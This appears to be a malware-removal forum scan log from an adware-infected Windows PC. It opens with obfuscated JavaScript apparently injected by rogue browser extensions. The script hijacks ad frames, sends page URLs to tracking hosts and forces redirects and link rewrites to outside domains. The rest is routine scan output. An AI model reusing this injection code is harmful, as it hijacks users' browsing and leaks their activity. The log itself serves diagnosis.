function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2561567&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1203,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type='+size+'&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();})()}else{(function(){var stngs = {attr_name:'s2754579029231123871',szy_domain:[\"getdownloadmy.com\",\"scoringserving.net\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10]],checkif:function(ifr){return (ifr.getAttribute('s2754579029231123871') || ifr.src.indexOf('=563910')>-1||ifr.src.indexOf('=458516')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};var adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"34\",eid:\"313\",hid:\"2754579029231123871\",lt:\"22.38\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"7o6w_srP\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if(c)for(var b=0,d=c.length;b=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\n\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"<=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords()),\"seta\"):adzy653rk.destruct()}else{if(b=adzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push(b);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},\n1200):(adzy653rk.src[b]&&adzy653rk.ifr[b]&&adzy653rk.ifr[b].src!=adzy653rk.src[b][0]&&(adzy653rk.ifr[b].nextSibling.innerHTML&&adzy653rk.ifr[b].nextSibling.innerHTML.match(/]?>Ads( not)? by/i)?(new Image).src=\"http://zig.installerdatauk.info/?aid=2&bid=1&hid=2754579029231123871&eid=313&pid=34&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src):((new Image).src=\"http://zig.installerdatauk.info/?aid=1&bid=1&hid=2754579029231123871&eid=313&pid=34&cid=0&c=\"+\nencodeURIComponent(adzy653rk.ifr[b].src),adzy653rk.ifrset(adzy653rk.ifr[b],adzy653rk.src[b][1],1))),setTimeout(function(){c(++b)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,1200)},getAt:function(a){a=[parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==\ntypeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b=c[b][0]-5&&a[0]<=c[b][0]+5&&a[1]>=c[b][1]-5&&a[1]<=c[b][1]+5)return c[b][2];return!1},getAds:function(a,c){if(-1\",\"\"];switch(c[1]){case 1:a.src=c[0]+(-1'+\nd[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b>2,k=(f&3)<<6|g,c=c+\nString.fromCharCode(d<<2|e>>4);64!=f&&0d)c+=String.fromCharCode(d),b++;else if(191d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 &&adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ad.yieldmanager.com servedby.adxplosions.com optimizedby.brealtime.com ib.adnxs.com ad.adnetwork.net fw.adsafeprotected.com Servedby.bigfineads.com an.z5x.net media.glispa.com ad.improvemedianetwork.com ad.jumbaexchange.com ad.reachjunction.com ad.adserverplus.com srv.aileronx.com ad.z5x.net\".indexOf(window.self.location.hostname)==-1 &&adzy653rk.location.indexOf(\"zoneid=563910\")==-1 &&adzy653rk.location.indexOf(\"zoneid=458516\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 &&adzy653rk.location.indexOf(\"1018-1005\")==-1 &&adzy653rk.location.indexOf(\"1019-1001\")==-1 &&adzy653rk.location.indexOf(\"PT1312\")==-1)adzy653rk.init()})()};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"7o6w_srP=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1
';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='',a.style.position=\"relative\",a.appendChild(b))},250);if(-1').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1-1) window.self.location.href='about:blank';if(-1-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=pdrKrjwKqjUKrjwFfHwHpjUFrHU7qHk%3D&eid=313&hid=2754579029231123871&pid=34&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;iparseInt(\"22.38\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch(c){}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})();(function(){void(0)})()"); FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation) FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/Lync,version=15.0: C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.3: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN) FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Marcin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS) FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-05-26 15:26:42 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014-05-17 11:58:55 | 000,000,000 | ---D | M] [2014-03-22 17:29:51 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Marcin\AppData\Roaming\mozilla\Extensions [2014-06-03 17:26:43 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Marcin\AppData\Roaming\mozilla\Firefox\Profiles\u40mh9q0.default\extensions [2014-04-24 18:52:47 | 000,000,000 | ---D | M] (savE nEET) -- C:\Users\Marcin\AppData\Roaming\mozilla\Firefox\Profiles\u40mh9q0.default\extensions\blpqui@houo.edu [2014-04-24 18:52:47 | 000,000,000 | ---D | M] (YoutubeAdblocker) -- C:\Users\Marcin\AppData\Roaming\mozilla\Firefox\Profiles\u40mh9q0.default\extensions\ef0omoct@yyx.com [2014-04-24 18:52:47 | 000,000,000 | ---D | M] (SNT) -- C:\Users\Marcin\AppData\Roaming\mozilla\Firefox\Profiles\u40mh9q0.default\extensions\m5arbs@oit-.co.uk [2014-03-22 17:30:36 | 000,287,566 | ---- | M] () (No name found) -- C:\Users\Marcin\AppData\Roaming\mozilla\firefox\profiles\u40mh9q0.default\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2014-04-24 18:52:49 | 000,007,863 | ---- | M] () -- C:\Users\Marcin\AppData\Roaming\mozilla\firefox\profiles\u40mh9q0.default\searchplugins\WebSearch.xml [2014-03-22 17:29:30 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\mozilla firefox\browser\extensions [2014-03-22 17:29:30 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\mozilla firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [2014-06-04 11:33:03 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\mozilla firefox\updated\browser\extensions [2014-06-04 11:33:09 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\mozilla firefox\updated\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} File not found (No name found) -- C:\USERS\MARCIN\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\U40MH9Q0.DEFAULT\EXTENSIONS\QUICK_START@GMAIL.COM [2012-10-01 21:43:54 | 000,034,016 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [color=#E56717]========== Chrome ==========[/color] CHR - default_search_provider: Google (Enabled) CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding} CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter}, CHR - homepage: http://www.google.com CHR - plugin: Error reading preferences file CHR - Extension: Dokumenty Google = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.6_0\ CHR - Extension: Dysk Google = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_1\ CHR - Extension: YouTube = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_1\ CHR - Extension: Adblock Plus = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.8.3_0\ CHR - Extension: Monster Dash = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cknghehebaconkajgiobncfleofebcog\2.2_1\ CHR - Extension: Szukaj w Google = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_1\ CHR - Extension: Gmail offline = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejidjjhkpiempkbhmpbfngldlkglhimk\1.20_1\ CHR - Extension: Mibbit webchat = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hbadbkkklnhamjjeagmknajgmbgcmnpi\1.12_1\ CHR - Extension: Gestures for Google Chrome™ = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0\ CHR - Extension: Illimitux = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\mamnihopcnbfnbfnnneplcohmnkkpipb\1.0_1\ CHR - Extension: LairDefense2 = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\naoojklomipbimoimfkodlpcahlbcpke\2_1\ CHR - Extension: Google Wallet = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\ CHR - Extension: Gmail = C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_2\ O1 HOSTS File: ([2013-08-22 15:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts O2:[b]64bit:[/b] - BHO: (save neT) - {408AC802-3DAF-C6DB-FC20-9E605D02E1CA} - C:\Program Files (x86)\save neT\uw.x64.dll () O2:[b]64bit:[/b] - BHO: (YoutubeAdblocker) - {47B66310-E516-6CD1-FC87-7E7EB0A06125} - C:\Program Files (x86)\YoutubeAdblocker\1FnAtoQk7d.x64.dll () O2:[b]64bit:[/b] - BHO: (SNT) - {74DD4B8D-FB69-6F7A-550B-4F1DA72C6F4B} - C:\Program Files (x86)\SNT\vd.x64.dll () O2:[b]64bit:[/b] - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation) O2:[b]64bit:[/b] - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software) O2:[b]64bit:[/b] - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) O2 - BHO: (Microsoft Web Test Recorder 12.0 Helper) - {432dd630-7e03-4c97-9d62-b99f52df4fc2} - C:\Program Files (x86)\Microsoft Visual Studio 12.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll (Microsoft Corporation) O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation) O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office15\URLREDIR.DLL (Microsoft Corporation) O2 - BHO: (Microsoft SkyDrive Pro Browser Helper) - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\PROGRA~2\MICROS~1\Office15\GROOVEEX.DLL (Microsoft Corporation) O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\windows\SysNative\hkcmd.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\windows\SysNative\igfxtray.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [IntelTBRunOnce] wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs" File not found O4:[b]64bit:[/b] - HKLM..\Run: [Launch LCore] C:\Program Files\Logitech Gaming Software\LCore.exe (Logitech Inc.) O4:[b]64bit:[/b] - HKLM..\Run: [NvBackend] C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (NVIDIA Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\windows\SysNative\igfxpers.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) O4:[b]64bit:[/b] - HKLM..\Run: [ShadowPlay] C:\windows\SysNative\nvspcap64.dll (NVIDIA Corporation) O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software) O4 - HKLM..\Run: [Bonus.SSR.FR11] C:\Program Files (x86)\ABBYY FineReader 11\Bonus.ScreenshotReader.exe (ABBYY) O4 - HKLM..\Run: [fst_pl_121] File not found O4 - HKLM..\Run: [KiesTrayAgent] C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe (Samsung Electronics Co., Ltd.) O4 - HKLM..\Run: [VolPanel] C:\Program Files (x86)\Creative\Sound Blaster Play\Volume Panel\VolPanlu.exe (Creative Technology Ltd) O4 - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001..\Run: [ApplePhotoStreams] C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe (Apple Inc.) O4 - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001..\Run: [ATnotes.exe] C:\Program Files (x86)\ATnotes\ATnotes.exe (Thomas Ascher) O4 - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001..\Run: [GG] C:\Users\Marcin\AppData\Local\GG\Application\gghub.exe (GG Network S.A.) O4 - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001..\Run: [iCloudServices] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (Apple Inc.) O4 - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001..\Run: [KiesPreload] C:\Program Files (x86)\Samsung\Kies\Kies.exe (Samsung) O4 - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\sidebar.exe (Microsoft Corporation) O4 - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001..\Run: [UpdateChecker] C:\Users\Marcin\AppData\Local\Popajar\UpdateChecker\UpdateCheckerApp.exe (Popajar, inc) O4 - Startup: C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sidebar383.lnk = C:\Program Files (x86)\Windows Sidebar\sidebar.exe (Microsoft Corporation) O4 - Startup: C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wysyłanie do programu OneNote.lnk = File not found O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Main present O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3 O9 - Extra 'Tools' menuitem : Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - Reg Error: Key error. File not found O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000008 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.) O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.) O13[b]64bit:[/b] - gopher Prefix: missing O13 - gopher Prefix: missing O16 - DPF: {6C269571-C6D7-4818-BCA4-32A035E8C884} http://ccfiles.creative.com/Web/softwareupdate/su/ocx/15102/CTSUEng.cab (Creative Software AutoUpdate) O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2) O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/130321/CTPID.cab (Creative Software AutoUpdate Support Package) O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 194.204.159.1 194.204.152.34 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{43F7DCCA-6C09-4278-82BF-4FFB8DB981B1}: DhcpNameServer = 192.168.1.1 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{4E4E969E-ABFE-48DE-AF79-CFBA6D04B620}: DhcpNameServer = 192.168.1.1 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{7673B2D0-DCFD-4532-8E94-CC6CA7BEF2D8}: DhcpNameServer = 194.204.159.1 194.204.152.34 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{DC3337A0-6B80-47E9-AEA5-8BF144090F0F}: DhcpNameServer = 192.168.1.1 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F107F506-3B62-484A-B75B-BCFA80FA42D9}: DhcpNameServer = 82.145.72.2 O18:[b]64bit:[/b] - Protocol\Handler\skype4com - No CLSID value found O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL (Skype Technologies) O20:[b]64bit:[/b] - AppInit_DLLs: (C:\PROGRA~2\SupTab\SEARCH~2.DLL) - File not found O20 - AppInit_DLLs: (C:\PROGRA~2\SupTab\SEARCH~1.DLL) - File not found O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation) O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\windows\SysWow64\explorer.exe (Microsoft Corporation) O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\windows\SysWow64\userinit.exe (Microsoft Corporation) O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\windows\SysNative\igfxdev.dll (Intel Corporation) O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. O32 - HKLM CDRom: AutoRun - 1 O33 - MountPoints2\{c7e6682a-e70e-11e3-9c85-240a6427b548}\Shell - "" = AutoRun O33 - MountPoints2\{c7e6682a-e70e-11e3-9c85-240a6427b548}\Shell\AutoRun\command - "" = "G:\LaunchU3.exe" -a O34 - HKLM BootExecute: (autocheck autochk *) O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %* O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %* O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %* O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=sxssrv,4) [color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color] [2014-06-04 11:47:06 | 000,000,000 | ---D | C] -- C:\Users\Marcin\Desktop\gmer [2014-06-04 11:46:17 | 002,061,824 | ---- | C] (Farbar) -- C:\Users\Marcin\Desktop\FRST64.exe [2014-06-04 11:41:32 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Marcin\Desktop\OTL.exe [2014-06-04 11:23:45 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Local\Thinstall [2014-06-04 11:12:35 | 000,313,256 | ---- | C] (Oracle Corporation) -- C:\windows\SysNative\javaws.exe [2014-06-04 11:12:27 | 000,189,352 | ---- | C] (Oracle Corporation) -- C:\windows\SysNative\javaw.exe [2014-06-04 11:12:27 | 000,189,352 | ---- | C] (Oracle Corporation) -- C:\windows\SysNative\java.exe [2014-06-04 11:12:27 | 000,108,968 | ---- | C] (Oracle Corporation) -- C:\windows\SysNative\WindowsAccessBridge-64.dll [2014-06-04 11:12:02 | 000,388,608 | ---- | C] (Trend Micro Inc.) -- C:\Users\Marcin\Desktop\HijackThis_2.0.4.exe [2014-06-04 11:10:55 | 